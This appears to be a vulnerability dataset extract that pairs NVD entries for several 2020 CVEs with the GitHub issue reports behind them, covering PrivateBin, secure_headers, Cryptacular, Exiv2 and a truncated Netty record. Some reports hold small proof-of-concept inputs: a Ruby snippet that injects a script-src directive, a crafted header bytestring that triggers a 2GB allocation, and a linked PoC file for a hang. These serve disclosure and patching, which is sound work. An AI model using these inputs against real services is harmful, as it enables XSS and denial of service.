I investigated the error condition found in the [property based unit test](https://github.com/PrivateBin/PrivateBin/blob/master/tst/README.md#property-based-unit-testing) with [RNG state 8b8f0d4ec2a67139b5](https://travis-ci.org/PrivateBin/PrivateBin/jobs/629180605#L782) for the `AttachmentViewer` class in an unrelated change. The error occurs in the `AttachmentViewer.moveAttachmentTo()` method, were we can provide a string that will have the filename inserted in place of any `%s` in that string and which then becomes the text node of the link to download the attachment. The error condition that jsverify found was when it generated a prefix `<a` for that label (so the label generated in that test case became `<a%s`). Since we insert that label untouched, it attempts to set another link into text node of a link, which isn't allowed in HTML and in the jsdom based environment gets silently ignored - Hence the test failed only for `<a />` tags, as other tags are allowed inside a link. While the label itself is from a trusted source (hardcoded in the translation files and privatebin.js), the filename that is injected isn't. If one would create a paste with attachment with a name containing HTML code (that can be easily done using one of the CLI clients), that paste would have that snippet injected when the paste is displayed. I have prepared a patch and updated unit test case that does the HTML entity encoding to address this and will push this ASAP. While file uploads are disabled by default, I would still suggest that we publish a release with this fix. Your opinions?
HTML injection via unescaped attachment filename
https://api.github.com/repos/PrivateBin/PrivateBin/issues/554/comments
3
2019-12-25T08:12:19Z
2020-01-11T12:08:54Z
https://github.com/PrivateBin/PrivateBin/issues/554
542,288,595
554
1,029
CVE-2020-5217
2020-01-23T03:15:10.793
In Secure Headers (RubyGem secure_headers), a directive injection vulnerability is present in versions before 3.8.0, 5.1.0, and 6.2.0. If user-supplied input was passed into append/override_content_security_policy_directives, a semicolon could be injected leading to directive injection. This could be used to e.g. override a script-src directive. Duplicate directives are ignored and the first one wins. The directives in secure_headers are sorted alphabetically so they pretty much all come before script-src. A previously undefined directive would receive a value even if SecureHeaders::OPT_OUT was supplied. The fixed versions will silently convert the semicolons to spaces and emit a deprecation warning when this happens. This will result in innocuous browser console messages if being exploited/accidentally used. In future releases, we will raise application errors resulting in 500s. Depending on what major version you are using, the fixed versions are 6.2.0, 5.1.0, 3.8.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.3, "impactScore": 2.7, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/twitter/secure_headers/commit/936a160e3e9659737a9f9eafce13eea36b5c9fa3" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/twitter/secure_headers/issues/418" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/twitter/secure_headers/pull/421" }, { "source": "security-advisories@github.com", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/twitter/secure_headers/commit/936a160e3e9659737a9f9eafce13eea36b5c9fa3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/twitter/secure_headers/issues/418" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/twitter/secure_headers/pull/421" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:twitter:secure_headers:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "F0F5AB6F-E584-4640-A497-3BC81A4171C8", "versionEndExcluding": "3.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:twitter:secure_headers:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "B8A7D02A-9E27-4388-A128-14BFCCA049CA", "versionEndExcluding": "5.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:twitter:secure_headers:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "D8B75B75-5C9C-4C8D-ACD6-214D042546E7", "versionEndExcluding": "6.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "6.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/twitter/secure_headers/issues/418
[ "Exploit", "Third Party Advisory" ]
github.com
[ "twitter", "secure_headers" ]
Consider the following Rails controller action which overwrites the frame ancestors based on some user input: ```ruby def show user_input_domain1 = URI.parse "https://google.com;script-src" user_input_domain2 = URI.parse "https://*;.;" user_input_domains = [user_input_domain1, user_input_domain2] override_content_security_policy_directives(frame_ancestors: whitelisted_domains) end ``` This results into the following response header: ``` frame-ancestors: https://google.com;script-src *; ``` This shows unexpected output, because by setting the frame ancestors the user is able to change the `script-src` opening possibilities for XSS. One solution to this would be to filter out the CSP rules inside of specific CSP rules: ```ruby frame_ancestor = value.gsub('script-src','').gsub('img-src', '') ```
Filtering CSP entries to prevent bypassing rules
https://api.github.com/repos/github/secure_headers/issues/418/comments
8
2020-01-21T16:25:57Z
2020-01-22T09:51:06Z
https://github.com/github/secure_headers/issues/418
552,986,063
418
1,030
CVE-2020-7226
2020-01-24T15:15:14.093
CiphertextHeader.java in Cryptacular 1.2.3, as used in Apereo CAS and other products, allows attackers to trigger excessive memory allocation during a decode operation, because the nonce array length associated with "new byte" may depend on untrusted input within the header of encoded data.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/apereo/cas/commit/8810f2b6c71d73341d4dde6b09a18eb46cfd6d45" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/apereo/cas/commit/93b1c3e9d90e36a19d0fa0f6efb863c6f0235e75" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/apereo/cas/commit/a042808d6adbbf44753d52c55cac5f533e24101f" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/apereo/cas/pull/4685" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/vt-middleware/cryptacular/blob/fafccd07ab1214e3588a35afe3c361519129605f/src/main/java/org/cryptacular/CiphertextHeader.java#L153" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/vt-middleware/cryptacular/blob/master/src/main/java/org/cryptacular/CiphertextHeader.java#L153" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/vt-middleware/cryptacular/issues/52" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r0847c7eb78c8f9e87d5b841fbd5da52b2ad4b4345e04b51c30621d88%40%3Ccommits.tomee.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r209de85beae4d257d27fc577e3a3e97039bdb4c2dc6f4a8e5a5a5811%40%3Ccommits.tomee.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r2237a27040b57adc2fcc5570bd530ad2038e67fcb2a3ce65283d3143%40%3Ccommits.tomee.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r380781f5b489cb3c818536cd3b3757e806bfe0bca188591e0051ac03%40%3Ccommits.ws.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r4a62133ad01d5f963755021027a4cce23f76b8674a13860d2978c7c8%40%3Ccommits.tomee.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r77c48cd851f60833df9a9c9c31f12243508e15d1b2a0961066d44fc6%40%3Ccommits.tomee.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rc36b75cabb4d700b48035d15ad8b8c2712bb32123572a1bdaec2510a%40%3Cdev.ws.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/re04e4f8f0d095387fb6b0ff9016a0af8c93f42e1de93b09298bfa547%40%3Ccommits.ws.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/re7f46c4cc29a4616e0aa669c84a0eb34832e83a8eef05189e2e59b44%40%3Cdev.ws.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rfa4647c58e375996e62a9094bffff6dc350ec311ba955b430e738945%40%3Cdev.ws.apache.org%3E" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/apereo/cas/commit/8810f2b6c71d73341d4dde6b09a18eb46cfd6d45" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/apereo/cas/commit/93b1c3e9d90e36a19d0fa0f6efb863c6f0235e75" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/apereo/cas/commit/a042808d6adbbf44753d52c55cac5f533e24101f" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/apereo/cas/pull/4685" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/vt-middleware/cryptacular/blob/fafccd07ab1214e3588a35afe3c361519129605f/src/main/java/org/cryptacular/CiphertextHeader.java#L153" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/vt-middleware/cryptacular/blob/master/src/main/java/org/cryptacular/CiphertextHeader.java#L153" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/vt-middleware/cryptacular/issues/52" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r0847c7eb78c8f9e87d5b841fbd5da52b2ad4b4345e04b51c30621d88%40%3Ccommits.tomee.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r209de85beae4d257d27fc577e3a3e97039bdb4c2dc6f4a8e5a5a5811%40%3Ccommits.tomee.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r2237a27040b57adc2fcc5570bd530ad2038e67fcb2a3ce65283d3143%40%3Ccommits.tomee.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r380781f5b489cb3c818536cd3b3757e806bfe0bca188591e0051ac03%40%3Ccommits.ws.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r4a62133ad01d5f963755021027a4cce23f76b8674a13860d2978c7c8%40%3Ccommits.tomee.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r77c48cd851f60833df9a9c9c31f12243508e15d1b2a0961066d44fc6%40%3Ccommits.tomee.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rc36b75cabb4d700b48035d15ad8b8c2712bb32123572a1bdaec2510a%40%3Cdev.ws.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/re04e4f8f0d095387fb6b0ff9016a0af8c93f42e1de93b09298bfa547%40%3Ccommits.ws.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/re7f46c4cc29a4616e0aa669c84a0eb34832e83a8eef05189e2e59b44%40%3Cdev.ws.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rfa4647c58e375996e62a9094bffff6dc350ec311ba955b430e738945%40%3Cdev.ws.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vt:cryptacular:*:*:*:*:*:*:*:*", "matchCriteriaId": "40E7BD9E-6868-4BDF-B686-7E018458ABF5", "versionEndExcluding": "1.1.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:vt:cryptacular:*:*:*:*:*:*:*:*", "matchCriteriaId": "CF83E2C8-49F2-4DC6-A2B5-A47C510632A3", "versionEndExcluding": "1.2.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.2.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "062E4E7C-55BB-46F3-8B61-5A663B565891", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "D551CAB1-4312-44AA-BDA8-A030817E153A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:webcenter_sites:12.2.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "174A6D2E-E42E-4C92-A194-C6A820CD7EF4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "04BCDC24-4A21-473C-8733-0D9CFB38A752", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/vt-middleware/cryptacular/issues/52
[ "Exploit", "Third Party Advisory" ]
github.com
[ "vt-middleware", "cryptacular" ]
Please confirm if it is vulnerable. Mitre id: CVE-2020-7226 Reporter: findneo > [Suggested description] > CiphertextHeader.java in > Cryptacular 1.2.3, as used in Apereo CAS and other products, allows > attackers to trigger excessive memory allocation during a decode > operation, because the nonce array length associated with "new byte" may > depend on untrusted input within the header of encoded data. > > ------------------------------------------ > > [Additional Information] > any encoded network communication based on > org.cryptacular.CiphertextHeader#decode(byte[]) is affected. xxx of > new byte[xxx] can be controlled by client and can be up to 0x7ffffffd > ,which caused 2G of memory consuming without demanding for any > privilege. > > one of the products using this vuln code is cas4.2.0. > login flow of cas4.2.0 based on > org.cryptacular.CiphertextHeader#decode(byte[]) ,Concretely > speaking,the affected code is > org.jasig.spring.webflow.plugin.EncryptedTranscoder#decode > > besides,codebase for cas4.2.0 is https://github.com/apereo/cas-overlay-template/commit/7eaf9d7b5b94eb1ba5aea1b2cd6311a86bddd90b > > ------------------------------------------ > > [VulnerabilityType Other] > Denial of Service > > ------------------------------------------ > > [Vendor of Product] > http://www.cryptacular.org/ > > ------------------------------------------ > > [Affected Product Code Base] > cryptacular - 1.2.3 > > ------------------------------------------ > > [Affected Component] > org.cryptacular.CiphertextHeader#decode(byte[]) , > https://github.com/vt-middleware/cryptacular/blob/master/src/main/java/org/cryptacular/CiphertextHeader.java#L153 > > ------------------------------------------ > > [Attack Type] > Remote > > ------------------------------------------ > > [Impact Denial of Service] > true > > ------------------------------------------ > > [Attack Vectors] > a crafted header of encoded data. > e.g '\x00\x00\x00\x34\x7f\xff\xff\xfd' >
Denial of Service in latest version [1.2.3]
https://api.github.com/repos/vt-middleware/cryptacular/issues/52/comments
7
2020-01-19T15:37:20Z
2020-02-27T14:58:50Z
https://github.com/vt-middleware/cryptacular/issues/52
551,940,473
52
1,031
CVE-2019-20421
2020-01-27T05:15:10.453
In Jp2Image::readMetadata() in jp2image.cpp in Exiv2 0.27.2, an input file can result in an infinite loop and hang, with high CPU consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/commit/a82098f4f90cd86297131b5663c3dec6a34470e8" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/1011" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00028.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4270-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4958" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/commit/a82098f4f90cd86297131b5663c3dec6a34470e8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/1011" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00028.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4270-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4958" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exiv2:exiv2:0.27.2:*:*:*:*:*:*:*", "matchCriteriaId": "7E9A8822-0F6F-4561-81B3-38235F52116E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "835" ]
835
https://github.com/Exiv2/exiv2/issues/1011
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "Exiv2", "exiv2" ]
**Describe the bug** An input file can result in an infinite loop and hang, with high CPU consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file. **To Reproduce** Steps to reproduce the behaviour: excute 'build/bin/exiv2 Jp2Image_readMetadata_loop.poc' **Expected behavior** An infinite loop and hang, with high CPU consumption ![image](https://user-images.githubusercontent.com/17027039/65876735-8d91a500-e3bc-11e9-8f5b-b3cf28823956.png) **Additional context** The poc is here [Jp2Image_readMetadata_loop.poc.zip](https://github.com/Exiv2/exiv2/files/3670911/Jp2Image_readMetadata_loop.poc.zip) The code: > io_->seek(restore,BasicIo::beg); > io_->seek(subBox.length, Exiv2::BasicIo::cur); leads to an infinite loop.
An infinite loop and hang in Exiv2::Jp2Image::readMetadata()
https://api.github.com/repos/Exiv2/exiv2/issues/1011/comments
3
2019-09-30T12:02:01Z
2020-03-29T11:43:49Z
https://github.com/Exiv2/exiv2/issues/1011
500,231,156
1,011
1,032
CVE-2020-7238
2020-01-27T17:15:12.277
Netty 4.1.43.Final allows HTTP Request Smuggling because it mishandles Transfer-Encoding whitespace (such as a [space]Transfer-Encoding:chunked line) and a later Content-Length header. This issue exists because of an incomplete fix for CVE-2019-16869.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0497" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0567" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0601" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0605" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0606" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0805" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jdordonezn/CVE-2020-72381/issues/1" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r131e572d003914843552fa45c4398b9903fb74144986e8b107c0a3a7%40%3Ccommits.cassandra.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rc8d554aad889d12b140d9fd7d2d6fc2e8716e9792f6f4e4b2cdc2d05%40%3Ccommits.cassandra.apache.org%3E" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46/" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://netty.io/news/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4885" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": 